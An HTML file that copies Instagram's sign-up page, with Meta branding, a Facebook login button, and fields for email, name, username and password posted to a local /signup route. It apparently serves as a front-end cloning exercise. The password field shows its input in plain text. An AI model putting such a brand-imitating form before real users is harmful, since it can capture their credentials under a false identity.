<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link rel="icon" type="image/png" sizes="32x32" href="./assets/favicon.png" />
    <link rel="stylesheet" href="style.css" />
    <title>Sign up - Instagram</title>
</head>

<body>
    <div class="wrapper">
        <form action="/signup" method="POST" class="form">
            <div><img src="assets/instalogo.png" alt="" /></div>
            <div>
                <p class="align bold padding">
                    Sign up to see photos and videos <br />from your friends.
                </p>
            </div>
            <div class="login-facebook padding">
                <div >
                    <img src="" alt="" />
                    <button class="fb-btn">
                        <p>Log in with Facebook</p>
                    </button>
                </div>
            </div>
            <div class="input-container">
                <input type="text" name="mobemail" id="mobemail" placeholder="Mobile Number or Email" />
                <input type="text" name="fullname" id="fullname" placeholder="Full Name" />
                <input type="text" name="username" id="username" placeholder="Username" />
                <input type="text" name="password" id="password" placeholder="Password" />
            </div>
            <div>
                <p class="align downtext padding">
                    People who use our service may have uploaded <br />your contact
                    information to Instagram. Learn <br />More
                </p>
            </div>
            <div class="align downtext padding">
                By signing up, you agree to our Terms , Privacy <br />Policy and
                Cookies Policy .
            </div>
            <input type="submit" value="Sign up" class="padding signupbtn">
        </form>

        <div class="downform">
            <p>Have an account? <a href="/login">Log in</a></p>
        </div>

        <div class="getapp">
            <img src="assets/googleplay.png" >
            <img src="assets/microsoft.png" >
        </div>

        <div class="footer">
            <ul>
                <li>Meta</li>
                <li>About</li>
                <li>Blog</li>
                <li>Jobs</li>
                <li>Help</li>
                <li>API</li>
                <li>Privacy</li>
                <li>Cookie Settings</li>
                <li>Terms</li>
                <li>Locations</li>
                <li>Instagram Lite</li>
                <li>Threads</li>
                <li>Contact Uploading & Non-Users</li>
                <li>Meta Verified</li>
            </ul>
            <p>&copy; 2024 Instagram from Meta</p>
        </div>
    </div>
</body>

</html>